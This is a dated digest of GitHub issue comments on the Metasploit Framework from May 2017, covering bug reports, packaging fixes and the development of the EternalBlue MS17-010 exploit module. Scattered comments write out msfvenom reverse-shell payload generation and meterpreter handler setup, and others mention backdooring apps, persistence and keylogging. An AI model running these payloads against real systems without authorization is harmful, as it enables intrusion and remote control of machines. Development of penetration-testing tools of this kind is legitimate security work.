Most of us have been doing BSides Austin for the past two days, but we'll look into it on our end when we have a chance.

My setup, where I'm unable to reproduce, is using a manually installed dev environment.  If this actually becomes a problem for anyone, you could always go that route, or if you're really adventurous, you could try one of the deb/rpm nightly installer packages.  (They work grea

[2017-05-05 22:25] busterb commented on #8339
Does 'msfconsole -L' work for you?

[2017-05-06 04:57] #8350 closed

[2017-05-06 04:59] busterb commented on #8349
Sounds good to me! I'll make an internal ticket so this gets tracked for the team that manages our Docker stuff.

[2017-05-06 10:29] 3rso commented on #8339
im getting the same issue, but if i does msfconsole -L the \r character is not shown

[2017-05-07 10:11] fang3anny commented on #8349
Thx ur share.nice to meet you.

[2017-05-07 11:35] Tikam02 commented on #7723
It works fine.

root@kali:~# # msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.210.132  LPORT=1337 PrependFork=true -f elf-so -o ELFSO
root@kali:~#

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.210.132
lhost => 192.168.210.132
msf exploit(handler) > set lp

[2017-05-08 02:35] wvu-r7 commented on #8351
Sounds about right.

[2017-05-08 02:35] #8351 closed

[2017-05-08 02:44] wvu-r7 commented on #7723
What works fine? Your example shows a Linux payload, but your handler shows a Windows payload.

[2017-05-08 02:49] wvu-r7 commented on #7723
And you haven't shown any successful output. Please explain how the problem is fixed.

[2017-05-08 08:09] zerosum0x0 commented on #8269
I have finished the x64 payload. It is ~707 bytes, NSA was ~4885, meaning it is 14.47% of the size. It's also not fully optimized yet. The payloads are normal userland shellcode instead of a DLL, so even the ring3 stuff is a lot smaller.

https://github.com/RiskSense-Ops/MS17-010/blob/master/payloads/x64/src/exploit/kernel.asm

While I mentioned it was cool the NSA code dynamically finds certain o

[2017-05-08 08:42] OJ commented on #8269
@zerosum0x0 I'm sure I can say this on behalf many of us, but thanks for all your efforts so far! It's greatly appreciated. I'd offer to throw some time in to help in some way but I'm already swamped enough (and probably useless to you anyway).

[2017-05-08 08:53] zerosum0x0 commented on #8269
Thanks @OJ. We obsess because it's somehow fun, right? Also, your contributions are far from useless to me, I think of you every time I load kiwi.

[2017-05-08 12:49] busterb commented on #7723
I think @Tikam02 might have forgotten to PR the his work. Looking forward to it.

[2017-05-08 14:02] sieunhando commented on #8269
Thanks @zerosum0x0, Can you tell me how I can exploit windows 8-8.1 with this exploit ? I tried but couldn't do it. Thanks.

[2017-05-08 15:12] wvu-r7 commented on #8269
This is not a support forum, folks. Please take it to IRC or https://community.rapid7.com/. Thanks.

[2017-05-08 15:15] dmaloney-r7 commented on #8269
@zerosum0x0 I'm working on trying to get everything needed for EternalBlue into the RubySMB library. https://github.com/rapid7/ruby_smb

This should hopefully be able to help with the efforts you're going through. I'm just finishing up the basic Trans2 system, and about to get some bare bones NT Transact stuff in. Please let me know anything specific you need/want from RubySMB to help you with thi

[2017-05-08 15:24] zerosum0x0 commented on #8269
@dmaloney-r7 we will definitely include what we can, thanks so much for the library no one else wanted to write. There are certain packets in EternalBlue that are basically not real SMB at all, just totally incoherent headers and full of shellcode spam, we'll probably just send to the raw socket for those. Basically if it has at least some basic level of Wireshark dissection, we'll write the prope

[2017-05-08 15:33] wvu-r7 commented on #8269
Thanks for your relentless dedication on this, @zerosum0x0. I think we can understand the obsession. ;)

[2017-05-08 15:55] dmaloney-r7 commented on #8269
@zerosum0x0 a bunch of them appear to be malformed generic Trans2 packets, which rubySMB should be able to support to a certain extent. You can create a Trans2Request packet, set all the headers and such, and at worst convert it to the binary string format, and then rip out what you don't need and jam your shellcode in there.

[2017-05-08 22:07] FireFart opened #8357 "Strange Stage Encoder behaviour"
I came across this issue when testing https://github.com/rapid7/metasploit-framework/pull/8355.

By default `EnableStageEncoding` is set to false. If you look at the output below, the payload `windows/shell/reverse_tcp` is used but the output says the stage is encoded:
[code]
This causes the exploit to fail. If I set `EnableStageEncoding` to true and the StageEncoder to `generic/none` the error me

[2017-05-08 22:24] bcoles commented on #8278
This module is rather old and unloved. Unfortunately I don't have a copy of Domino 7.x and 8.x to test fixes. It appears the login functionality is totally different on 9.x.

There's also some use of unusual escaping, such as escaping `/` with `\/` in URLs and `<` with `\<` in regex. The former caused the module to fail as per my diff above.

`/` does not need to be esacaped in URLs, as per the [o

[2017-05-08 23:08] rwhitcroft commented on #8357
Seems like the stage is being forcefully encoded because a bad char has been specified (`\x00`).

[2017-05-08 23:14] rwhitcroft commented on #8357
Is the stage being forcefully encoded because a bad char has been specified? (`\x00`)

[2017-05-09 02:30] jduck commented on #6740
Many versions of Android before 5.x (and some on 5.x) are considerably more difficult to exploit due to the fact that they use dlmalloc instead of jemalloc. Versions prior to 5.x do not allow using the infoleak technique used in the existing metasploit module. These two facts add up to make it pretty hard to get working exploits for devices running these versions.

[2017-05-09 06:36] mapagm opened #8359 "post/windows/capture/keylog_recorder / Meterpreter keyscan API"
Hi,

I used to use a _**post/windows/capture/keylog_recorder**_ module. From some time my output file looks like this:

[code]

Is this output file format configurable? First issue is that the time zone in the output file is incorrect (UTC instead CET in my case). Second is that i don't need a process name and time stamp in the output file - especially when time interval to save keystrokes is set

[2017-05-09 14:22] FireFart opened #8360 "NoMethodError undefined method `[]' for nil:NilClass in post/windows/manage/migrate"
Came across this by accident because I did not unset the `AutoRunScript` when switching to a simple shell.
Here is the error:
https://github.com/rapid7/metasploit-framework/blob/04f11b0bf7d79b79485bbbe04d86bc59cb3d956a/modules/post/windows/manage/migrate.rb#L34

This script is missing a check if it's run inside a meterpreter session.

[code]

# Settings
[code]

[code]

[2017-05-09 15:03] egypt commented on #8357
Reproduced. This is super weird.

[2017-05-09 15:31] FireFart commented on #8357
@egypt can it have smth to do with this line of code?
https://github.com/rapid7/metasploit-framework/blob/2207891f0a8e465f4faf45f8a5c8ca01369a145d/modules/payloads/stages/windows/shell.rb#L55

[2017-05-09 15:47] J0hn- opened #8362 "Documentation update (wiki)"
Hi!
I found a little mistake while I was translating the wiki page [How to get started with writing an auxiliary module](https://github.com/rapid7/metasploit-framework/wiki/How-to-get-started-with-writing-an-auxiliary-module)
"gathers" in the main categories of auxiliary modules doesn't exist anymore, it's "gather"

Furthermore, I think the « crawler » category should be removed with the only modu

[2017-05-09 16:07] egypt commented on #8357
@FireFart Yeah, it does for sure, but I don't have any idea yet why it would fail to encode or cause issues.

[2017-05-09 20:50] wwebb-r7 commented on #8359
I suspected this might be an issue to someone somewhere when I added it, but stopped short of adding it due to time.  I'll definitely take a look into adding a switch to turn it off soon though.

[2017-05-09 23:27] wvu-r7 commented on #8362
https://github.com/rapid7/metasploit-framework/wiki/How-to-get-started-with-writing-an-auxiliary-module/78e6b77d6b466303163c2f9f61bad378d086efb6

https://github.com/rapid7/metasploit-framework/wiki/How-to-get-started-with-writing-an-auxiliary-module/ce95afe24d0986ee8a20924d5a3a6bc0385781e9

[2017-05-09 23:27] #8362 closed

[2017-05-10 06:38] wvu-r7 commented on #8360
Do you no longer get a warning that you're running the post module inside an incompatible (shell) session? I noticed the loss of the message some time ago and was wondering if it still exists.

[2017-05-10 07:27] FireFart commented on #8360
@wvu-r7 nope. To reproduce run the following command and connect via netcat in another terminal to the listener:
[code]

[2017-05-10 07:28] mapagm commented on #8359
Great! After an hour of keylog_recorder module action my output file with this aditional informations:
[code]
has thousands of lines, of which only about 10% contains captured keystrokes. So I'm waiting for the update. Thanks.

[2017-05-10 14:26] jennamagius commented on #8269
Quick update here: we have a working python script that uses EternalBlue to run msfvenom output directly without ever installing DoublePulsar at https://github.com/RiskSense-Ops/MS17-010 in exploits/eternalblue . It's still pretty ramshackle, but the hardest parts are out of the way.

From here, we're working on: packaging it in a module, nulling out as much of the non-shellcode packets as possibl

[2017-05-10 15:47] wwebb-r7 commented on #8359
For the time being, you could try something like this as a workaround:

`awk '!/^\-\[ |^\*\*$/' < log.txt > cleanlog.txt`

That will leave you with some whitespace, but things should be much more readable.

[2017-05-10 18:22] wvu-r7 commented on #8269
Thanks so much, @jennamagius! My regards to both you and @zerosum0x0 for handling this.

[2017-05-10 19:09] wvu-r7 commented on #8360
Sounds like a regression in #7737/#7888.

[2017-05-10 19:15] wvu-r7 commented on #8360
IIRC, I looked into this before and found that `setup` wasn't being run.

[2017-05-10 19:15] wvu-r7 commented on #8360
Also, post modules should really show session compatibility in `info`.

[2017-05-10 21:54] FireFart commented on #7923
Current output (looks like one more module with errors was added):
[code]

[2017-05-11 01:43] zerosum0x0 commented on #8269
@dmaloney-r7 I have created an issue on ruby_smb we can use to discuss needed components https://github.com/rapid7/ruby_smb/issues/89

[2017-05-11 16:02] #8311 closed

[2017-05-12 03:16] zerosum0x0 commented on #8269
@jennamagius and I have been experimenting, we've narrowed EternalBlue down to about 3 different types of packets. We are juggling their order to see if triggering rate can be improved. We haven't yet experimented with delta grooming and threading. We were also able to remove the 10 second sleep the original exploit uses.

Right now with all of our experiments, we can trigger 2-7 times in a row pr

[2017-05-12 03:18] wvu-r7 commented on #8269
No rush. Been following your work at https://github.com/RiskSense-Ops/MS17-010, too. Cheers!

[2017-05-12 07:00] emanuelb opened #8374 "PHP payloads use unneeded double quotes instead of single quotes"
PHP payloads use unneeded double quotes when string won't contain special chars, such as \r\n$ (new-lines and variables) instead of single quotes.
thus have minor impact on performance but more important it's force usage of php/base64 encoder when it can be avoided.
for example:
[code]
while the payload contain " in:
$c = base64_decode("Y2FsYw==");
$c=$c." 2>&1\n";

fix:
	use single quotes instead

[2017-05-12 07:15] emanuelb opened #8375 "php/base64 encoder generate PHP Notice"
## Steps to reproduce

run:
[code]

Result
[code]

## Expected behavior

No Notices returned.

## Current behavior

PHP Notice:  Use of undefined constant ...
which may be logged into file/syslog depend on error_log directive value in php.ini
https://secure.php.net/manual/en/errorfunc.configuration.php#ini.error-log

fix:
have option / other encoder which won't pass constants as values to function

[2017-05-12 08:28] OJ commented on #8374
IMHO, this has nothing to do with the PHP payloads themselves, as the payloads should be able to use whatever characters they need. This is a problem with the encoding.

The same argument could be applied to the opposite case (where `'` is a bad char). The issue should be fixed at the encoder level, not at the payload level.

[2017-05-12 15:31] emanuelb commented on #8374
The point is that it might be better to use only ' or " in PHP payloads (thus one of them in badchars won't effect the payload), on other hand a smart encoder can do the transformation between single quotes and double quotes so it might belong to encoders.

[2017-05-13 14:45] Ghostboy-287 opened #8377 "problem with ruby [windows]"
i was using metasploit without any problem but i had error messages when i tested it with newest ruby version ( strictly high than >2.2.4) :

### Error message while running `msfconsole`

[code]

 **ps** : i runned `gem install bundler` & `bundle install` before running `msfconsole`

### Metasploit version
latest one (metasploit v4.14.18-dev-405f2c6ca1)

### I installed Metasploit with:
- [ ] Sour

[2017-05-13 15:42] busterb commented on #8377
The issue is with the upstream gem, not Metasploit. Unfortunately, the bcrypt gem maintainer has not fixed the issue yet: https://github.com/codahale/bcrypt-ruby/issues/142

In the mean time, see the workaround we included in the Omnibus metasploit installers for Windows:

https://github.com/rapid7/metasploit-omnibus/blob/e6f35c828b397216637596c62720f71b940799ce/config/software/metasploit-framewor

[2017-05-13 15:42] #8377 closed

[2017-05-13 15:43] busterb commented on #8377
Since you encountered this issue using Pentestbox, could you please contact the maintainer there and have them apply the same workaround for now? Thanks.

[2017-05-13 19:33] timwr commented on #7703
Did you mean to close this? I think it's a valid feature request. Happy to help out.
You could even take an existing .app file and backdoor it (msfvenom -x)

[2017-05-13 19:51] thecarterb commented on #7703
I was closing some old issues of mine, but I'll probably work on this in the near future. My thought was to add `.app` as a output format. The steps would be: `Shellcode -> macho file -> generate .plist and that stuff -> put together into an app`

[2017-05-13 23:22] thecarterb commented on #7703
@timwr Whipped something up today: https://github.com/thecarterb/metasploit-framework/blob/macho2app-dev/tools/exploit/macho2app.rb.

Reference:

- https://developer.apple.com/library/content/documentation/CoreFoundation/Conceptual/CFBundles/BundleTypes/BundleTypes.html#//apple_ref/doc/uid/10000123i-CH101-SW1

[2017-05-14 10:10] zerosum0x0 commented on #8269
We have EternalBlue, full Metasploit port. No opaque binary, either.

http://i.imgur.com/7bCvFAA.png

https://github.com/RiskSense-Ops/MS17-010/blob/master/exploits/eternalblue/ms17_010_eternalblue.rb

The code is still a little rough. I spent all day reverse engineering the semantics of every packet, which Wireshark was only marginally helpful. It was an eternal BSOD. Should be stable now.

I tri

[2017-05-14 15:04] richardski commented on #8269
Really excellent work

Richard

[2017-05-14 16:14] wvu-r7 commented on #8269
Thanks again, @zerosum0x0 && @jennamagius. Feel free to assign me to the PR when it comes in. Cheers! :cake:

[2017-05-14 19:25] Viss commented on #8269
![thank-you-smith](https://cloud.githubusercontent.com/assets/1756255/26037065/724aa36a-38a0-11e7-8e6e-1df3c0a95854.gif)

[2017-05-14 22:26] hdm commented on #8269
Awesome work! One small request would be to convert the ```make_kernel_shellcode()``` method to use inline Metasm, which would make it easier to follow and adjust in the future. There are a bunch of small tweaks that might make this more likely to bypass an IDS filter, but I can take a stab at those once the PR is landed. Thank you!

[2017-05-14 22:47] zerosum0x0 commented on #8269
Completely agree @hdm , `make_kernel_code()` can't stand as a raw binary blob like that. As you said, there are opportunities for small tweaks. I left "\x41" as a placeholder for random data.

One question I have is, I have a 5 second sleep so we can see if the exploit stages. Can I get a list of pending connections from the handler? Then it can be a 1 second sleep.

I have to say this new exploit

[2017-05-15 00:23] zerosum0x0 commented on #8269
Made a branch for PR https://github.com/rapid7/metasploit-framework/pull/8381

[2017-05-15 13:32] busterb opened #8382 "linux stagers need to support retries / delays like the Windows stagers do"
Currently, as #7722 points out, the linux payload stagers are all one-shot and if there is a staging failure, the payload simply doesn't load. It would be nice if there was an optional loop and a delay that allowed for multiple tries before failure.

[2017-05-15 13:34] busterb opened #8383 "support staging from powerpc / e500 targets"
PowerPC, and namely e500, CPUs are in a lot of printers and other embedded devices. We need a stager for these devices to be able to support loading payloads like Meterpreter.

[2017-05-15 14:07] busterb opened #8384 "convert linux x86/x64 stagers to use metasm"
Right now the shellcode uses blockapi blobs, which makes enabling features like retries, etc. kind of awkward. It would be nice to convert these so they are easier to tweak and enhance on the fly.

[2017-05-15 14:08] busterb opened #8385 "make all linux stagers consistently use the same handoff semantics"
I forget some of the details, @acammack-r7 would remember better, but it sounds like arm/mips/x86 have some subtle nuances in how the payload length is encoded that make staging universally across architectures awkward. This is a blocker for a 'universal' handler.

[2017-05-15 14:11] busterb opened #8386 "Allow staging Linux native payloads over HTTP / HTTPS"
This is tricky because Linux does not have a universal HTTP/S library like Windows does. One approach might be a tiny HTTPS library like https://fuchsia.googlesource.com/vapidssl/ to build a stager in C. Or maybe stage to memory from python, perl, php, etc.

[2017-05-15 14:15] busterb opened #8387 "Implement simple compression / encoding of meterpreter stages"
This is especially evident in x64 mettle payloads, but because the payloads include padding, the elf2bin payload blobs are a lot larger than they need to be. A 700k elf file becomes almost 3MB on the wire because we literally transfer all of the padding null bytes into the target memory image. This is a similar story with Python meterpreter where quite a bit is whitespace.

It would be nice if the

[2017-05-15 14:19] busterb opened #8388 "Implement stage verification"
Right now, stagers implicitly trust all shellcode sent to them. This makes it possible, especially with bind stagers, for an adversary to inject his own shellcode, making the staging process more like a race-to-RCE between the tester and a third-party adversary.

It would be nice if stagers could prevent this and refuse shellcode from unauthenticated sources (e.g. verify sender IP / port), and/or

[2017-05-15 14:21] busterb opened #8389 "Implement TCP UUID support in Linux stagers"
Currently, this is missing, which makes it hard to support paranoid mode with reverse_tcp. Of course, we may want to entirely rethink whether this is important, or if reverse_tcp staging is kind of an anachronism (it's hard to enhance it without breaking a lot of things that just assume 'connect and shell')

[2017-05-15 14:22] acammack-r7 commented on #8385
Yep, the ARM reverse and bind shellcodes read a length off the wire, allocate memory for that much payload, and enter a read loop, while other arches do a single `read(2)` up to 4k.

[2017-05-15 14:23] cong-long commented on #8302
I  meet this problem too  :(

[code]

[2017-05-15 15:23] dmaloney-r7 commented on #8269
@zerosum0x0 great work mate, i'm still working on getting everything in place with RubySMB to help support this. Don't let me hold you up though, we can always go back and refactor RubySMB in.

[2017-05-15 17:40] toekhaing commented on #8269
Great! I'll test it soon

[2017-05-16 00:22] h00die commented on #8281
done all of them

[2017-05-16 00:22] #8281 closed

[2017-05-16 00:35] #7443 closed

[2017-05-16 02:27] jamieduk opened #8392 "Automatic Persistence Makes Loop How To Solve?"
## Steps to reproduce

How'd you do it?

1. ...in .rc file auto run for persistence goes
2. ...launch and watch it go into a stupid loop,

I am using linux for msf and windows for reverse shell payload launching

i am using an .rc file for the auto script entry as seen below i have tested a lot of ways...

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.0.10

[2017-05-16 02:45] jamieduk commented on #8392
pps, a walk around is to have 1 pc get the initail connection and send persistent stage for a second pc, thats not viable, a better way to have this working as it should is to just have an option for persistence from the 1st payload (i made via setoolkit) any ideas how i can get this done or fixed?

[2017-05-16 04:03] timwr commented on #8392
`scripts/meterpreter/persistence.rb` is deprecated!
Why not try one of the many persistence modules in `modules/exploits/windows/local`?

Most of them include an option that prevents them from running after the persistence module is executed, e.g:
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/persistence.rb#L65
https://github.com/rapid7/metasploit-framew

[2017-05-16 04:06] LuYuChengProject opened #8393 "windows/metsvc_bind_tcp SSL problem ！"
msf exploit(handler) > exploit

[*] Started bind handler
[-] OpenSSL::SSL::SSLError SSL_accept SYSCALL returned=5 errno=0 state=SSLv2/v3 read client hello A
[*] Starting the payload handler...

What's this ?  is that affect my working?

[2017-05-16 09:43] jihadLkmaty218 commented on #8269
hi Gro... Script > Exploit  All systems Linux From my design
Exploit > figlet
218 > Is my code > Libya ^_^ thanks On All
So I called it
That's why I called this CVE-2017-218
SCript
Link
https://github.com/jihadLkmaty218/CVE-2017-218-Exploit-Terminal-
​
7
![screenshot from 2017-05-08 10-32-45](https://cloud.githubusercontent.com/assets/25440152/25804544/95934adc-33fc-11e7-96f3-4114083d3c82.png)
8
​

[2017-05-16 12:31] etormadiv commented on #8220
So, one should update ie8 to ie10 or ie11 to make the exploit working ? I spent one day trying to make it working under windows 7 sp1 with ie8 (fresh installation) but it is not, I just receive one GET request, but no
second request to the payload is made (under windows 7 sp1 with ie8).

[2017-05-16 16:53] paulmenzel opened #8396 "Please use more secure HTTPS URL in GitHub description"
This is more secure, and would save one redirect.

[code]

[2017-05-16 22:35] #8396 closed

[2017-05-16 22:47] jmartin-r7 commented on #8396
An internal request has been made to update this on the landing page as well, closed this for updates in README.md.

[2017-05-16 23:35] NnB01 opened #8398 "fatal: needed a single revision"
## Steps to reproduce

How'd you do it?

1. sudo msfconsole

## Expected behavior

start metasploit-framework without any errors.

## Current behavior

terminal says:
"**fatal: Needed a single revision**" and metasploit starts loading normally.
I'm not really sure if this fatal error is able to disrupt metasploits normal operation even though it starts normally.

## System stuff

### Metasploit ve

[2017-05-16 23:39] mandrillmaze commented on #8269
Awesome work dudes. Thank you for sharing! Had a lot of fun with this today.

I've created a minor issue about the `ProcessName` option not working here https://github.com/RiskSense-Ops/MS17-010/issues/17.

Similarly, one about a replicable SMB set up that causes exploit failure and cause the victim user to be logged out after a minute here https://github.com/RiskSense-Ops/MS17-010/issues/18

[2017-05-17 01:03] wvu-r7 commented on #8269
Responded to your first issue, @mandrillmaze. Thanks.

[2017-05-17 02:39] wvu-r7 commented on #8398
Try posting a screenshot. That error sounds like it's coming from `git rebase`, which is a strange thing to be seeing when you start `msfconsole`.

[2017-05-17 03:09] busterb commented on #8398
If this is a native 'ParrotSec OS' package, please contact the maintainer rather than us. It sounds like they have a problem with how Metasploit is packaged. If they are packaging Metasploit without the .git directory, they need to apply a patch like this:

https://github.com/rapid7/metasploit-omnibus/blob/master/config/patches/metasploit-framework/no-git.diff

[2017-05-17 03:14] #8398 closed

[2017-05-17 03:14] wvu-r7 commented on #8398
Yeah, this is definitely not a Metasploit bug.

[2017-05-17 03:14] NnB01 commented on #8398
![github](https://cloud.githubusercontent.com/assets/21063734/26136889/466dd40a-3ac7-11e7-93a1-a62658362d4c.png)

This is exactly what happens. I made also another test to make sure that this is not a maintainer problem, i ran same iso on a live usb and ran metasploit, no message like this appeared. Also i'm pretty sure that this started when i downloaded and installed other tools with git method

[2017-05-17 03:18] wvu-r7 commented on #8398
`strace` it. ¯\\\_(ツ)\_/¯

[2017-05-17 03:26] busterb commented on #8398
Pretty sure the patch above is at least part of the answer.

[2017-05-17 03:28] NnB01 commented on #8398
No doubt, but how can i use that please?

[2017-05-17 03:42] wvu-r7 commented on #8398
The diff above is for our Omnibus package. If you want to use it, you want to talk to the package maintainer for your distro.

[2017-05-17 04:16] timwr commented on #8122
I made an attempt here:
It's a bit buggy because it replaces app_process, and can crash half way through (I can't work out whether that's better or worse than dirtycowing libc).
https://github.com/rapid7/metasploit-framework/compare/master...timwr:dirtycow_rebase
Replacing app_process gives you system_server uid 0, but the SELinux context doesn't allow execmem (so no staging), there isn't space in

[2017-05-17 08:15] MuLx10 opened #8400 "Undefined methods"
[-] 192.168.20.237:445 - undefined method `tree_connect' for #<RubySMB::Client:0x0055a4a183b8f0>
[-] 192.168.20.237:445 - /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb:235:in `smb1_anonymous_connect_ipc'
/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb:153:in `smb_eternalblue'
/usr/share/metasploit-framework/modules/exploit

[2017-05-17 09:40] nyanloutre commented on #8349
I have a problem with the building of the image. It's about the line "/usr/sbin/setcap cap_net_raw,cap_net_bind_service+eip /usr/local/bin/ruby"
It seem setcap is not supported by all Docker configurations

[2017-05-17 12:09] cong-long commented on #8302
@Markakd @walunte I fix it, I update oxs 10.11.6  to 10.12.5 (16F73), then  use "xcode-select --install" reinstall  xcode commandline tools. now , i can use msf. LOL
[code]

[2017-05-17 12:37] okiwoki opened #8402 "nfsmount auxiliary scanner crashes from clnt_create: RPC: Port mapper failure - Authentication error"
## Steps to reproduce

How'd you do it?

1. Do a showmount -e on an IP that returns this error: clnt_create: RPC: Port mapper failure -
 Authentication error
2. Set that IP as RHOST in the nfsmount auxiliary scanner.

This section should also tell us any relevant information about the
environment; for example, if an exploit that used to work is failing,
tell us the victim operating system and serv

[2017-05-17 13:09] ilyaglow commented on #8349
Hey, @nyanloutre what is your host OS and docker version?

[2017-05-17 15:54] mandrillmaze commented on #8269
Since the original repo was just nuked (because support was very understandably nightmarish), I'll report the minor issues here:
[ms17_010_eternalblue.rb](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/smb/ms17_010_eternalblue.rb)
#### ProcessName is currently superficial
One can write `set ProcessName not_a_thing.exe.jpg` and the exploit will still function. I

[2017-05-17 16:21] zerosum0x0 commented on #8269
Thanks @mandrillmaze the first item was on the list for #8399, I have gone ahead and added the second item as well.

[2017-05-17 17:15] FireFart commented on #8349
@nyanloutre what's the exact error? Can you please open a new issue about this?

[2017-05-17 21:05] Gilks opened #8404 "Bind modules to remote sessions"
## Steps to reproduce

Establish a valid session.  For this example, the session is established on 192.168.1.20.  Assuming the session number is "2":

1. route add 192.168.1.1/24 2
2. use auxiliary/server/capture/telnet
3. set ListenerComm 2
4. set SRVHOST 192.168.1.20
5. exploit

## Expected behavior

A telnet listener should open on the remote host.

## Current behavior
[code]

## System stuff

[2017-05-17 22:28] busterb opened #8405 "some Ruby 2.4-ism's in the tree"
Using Ruby 2.4 can be a little tricky - while that's the version we have in-tree and the one we package with omnibus, not everyone has upgraded yet, so a few things are broken in 2.3:

[05/17/2017 13:16:47] [e(0)] core: Unable to load module /root/metasploit-framework/modules/exploits/linux/smtp/haraka.py NoMethodError undefined method `match?' for #<String:0x0055db7406e9d8>

It looks like we're u

[2017-05-18 03:25] busterb commented on #8405
I wonder if including https://github.com/marcandre/backports and calling it a day might be simpler and allow adopting newer idioms more quickly.

[2017-05-18 05:04] busterb commented on #8405
I added the backports Library above ^ which appears to fix the issue for Ruby 2.3. Any objections to this approach?

[2017-05-18 05:55] busterb opened #8407 "use minimal permission in buffer allocations in shellcode"
We've discussed this a few times already, but it would be nice if shellcode did not allocate RWX buffers, but instead only did RW, then RX, applying an intermediate mapping update after the write.
This solves some problems getting past W^X violation checks, and can also solve an issue with Linux staged shellcode where invalid flags are passed to mmap (which Linux ignores, but Windows subsystem for

[2017-05-18 07:54] BlackMathIT opened #8408 "Some issue on every Auxiliary modules parsing RHOSTS"
Every auxiliary module fails to validate RHOSTS passing a file or single occurrency when one or more of the target machine aren't available on the network, receiving the "Auxiliary failed:Msf::OptionValidateError The following options failed to validate: RHOSTS" error.

We suppose the module have some issue when it encounters a not solved dnsname as unique entry or inside a file list, so this stop

[2017-05-18 12:23] busterb commented on #8408
@clee-r7 / @darkbushido this fits right in your wheelhouse

[2017-05-18 13:54] BlackMathIT commented on #8408
We thing there is something wrong because if we want to scan a list of machines entries of a domain it's unbeliveable that we have to check if they are alive on the net before....

[2017-05-18 14:39] busterb commented on #8408
It don't believe it checks if they are alive, it just tries to convert the DNS entries into IP addresses. I'm guessing your file contains a list of hostnames?

[2017-05-18 14:50] 7a opened #8410 "Unable to generate an elf.so with msfvenom for Android"
## Steps to reproduce

Run this command:
[code]

Output:
[code]

## Expected behavior

What should happen?
The payload should be generated without errors. I need to generate a payload in an *elf.so* format for Android, and as of right now msfvenom fails to do this with any Android payload. Any ideas or workarounds?

## Current behavior

What happens instead?
The payload is not generated, msfvenom

[2017-05-18 14:52] busterb commented on #8410
Remove  '-e x86/shikata_ga_nai' , it makes no sense for android / java.

[2017-05-18 14:54] 7a commented on #8410
done, but same error:

[code]

[2017-05-18 15:42] timwr commented on #8410
I assume you want an arm Linux meterpreter .so template that works on Android?
I made an attempt to get this to work here:
https://github.com/timwr/metasploit-framework/commit/422e4b6b70a40e6b15290167741e311ad0d5446a
Unfortunately it was still segfaulting on Android so I never sent a pr. I'd be interested to know if the segfault was just on android, or if would work on non-android arm Linux (e.g a

[2017-05-18 15:48] 7a commented on #8410
I would be happy with a reverse shell to be honest, just trying to PoC an RCE from SQLi, which requires loading an attacker-controlled elf.so on Android.

[2017-05-18 16:12] jmartin-r7 commented on #8410
As @timwr noted we don't currently have support for native android .so payloads, happy to accept a new PR that add this as an option.  Closing this for now as not a supported option in msfvenom.

Collaboration on getting support for native interactions with bionic would produce great added functionality.

[2017-05-18 16:12] #8410 closed

[2017-05-18 16:24] timwr commented on #8410
@7a, assuming you're targetting 32bit arm the payload from this exploit should work:
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/android/local/futex_requeue.rb
If you're feeling clever you can just comment out the actual exploit and use the payload/shellcode:
https://github.com/rapid7/metasploit-framework/blob/master/external/source/exploits/CVE-2014-3153/futex_requ

[2017-05-18 17:25] AgoraSecurity opened #8413 "iis_webdav_scstoragepathfromurl not working on 64 bits"
## Steps to reproduce

How'd you do it?

1. Setup a Windows Server 2003 64 bits.
2. Install IIS and enable WebDAV.
3. Configure and run module.

This section should also tell us any relevant information about the
environment; for example, if an exploit that used to work is failing,
tell us the victim operating system and service versions.

## Expected behavior

What should happen?
The exploit shou

[2017-05-18 17:37] FireFart commented on #8413
@AgoraSecurity can you please set "HTTP_TRACE" to true and post the output? It looks like your webdav server is not responding correctly

[2017-05-18 17:49] AgoraSecurity commented on #8413
Sure

[code]
....
[code]

[2017-05-18 17:53] FireFart commented on #8413
@AgoraSecurity ah I see the second error was related to the HTTP 500 from the previous run. We tested the exploit only against x86 maybe the payload is not working on x64.
Have you tried changing the MIN and MAX_PATH_LEN ? This Length should reflect the string length of the physical webroot the website points to. So C:\inetpub\wwwroot\ would be 19 for example

[2017-05-18 17:57] AgoraSecurity commented on #8413
I haven't tried changing the MIN and MAX_PATH_LEN. I'll try.

[2017-05-18 18:00] AgoraSecurity commented on #8413
I've used several values (17,18, etc.) and it still don't work.
I guess since it's a BoF the return address is not the correct one and it somehow causes a DoS on the WebDav service/component.

[2017-05-18 18:11] #7703 closed

[2017-05-18 20:39] FireFart commented on #8413
@wchen-r7 do you have an win2k3 x64 machine ready to test this exploit? Maybe we need to adjust the target to only support x86 :/

[2017-05-18 23:35] wvu-r7 opened #8415 "Module request: Oracle PeopleSoft XXE RCE"
https://www.ambionics.io/blog/oracle-peoplesoft-xxe-to-rce

Read this the other night and thought it was an excellent finding. I've seen this software in use with (un)surprising frequency, too.

I want to write a module for it, but I'm not sure I'll find the time this week. If someone else picks it up before I do, please leave a note! Tentatively holding this until someone speaks up.

FYI, I don't

[2017-05-19 02:52] #8405 closed

[2017-05-19 06:00] wizard32 commented on #8339
I can also verify the same behavior. On Arch environment I'm getting also the \r character after pressing the Enter button. Running msfconsole -L as @3rso suggested solves the "problem".

[2017-05-19 13:18] fcafra opened #8416 "ms17_010_eternalblue - NoMethodError - undefined method `[]' for nil:NilClass"
## Steps to reproduce
msf exploit(ms17_010_eternalblue) > exploit

Receiving response from exploit packet
[-] x:445 - NoMethodError
[-] x:445 - undefined method `[]' for nil:NilClass
[-] x:445 - /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb:293:in `smb1_get_response'
/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb:188:in `

[2017-05-19 15:31] bwatters-r7 commented on #8416
What version of Windows are you targeting?  (Please include version, arch, and release, so we can try to re-create the error.)

[2017-05-19 17:04] Aminekanane commented on #8302
Still not able to run metasploit on osc 10.11.6 any other solution i can use ?

[2017-05-19 17:34] islamTaha12 commented on #8416
I have the same error too:
![screenshot from 2017-05-19 19-26-15](https://cloud.githubusercontent.com/assets/17981089/26259565/e1f85e6e-3cc9-11e7-80dd-a26356121c37.png)

# Target specs:
Windows Server 2008 R2 Enterprise 7601 Service Pack 1

# Payload info:
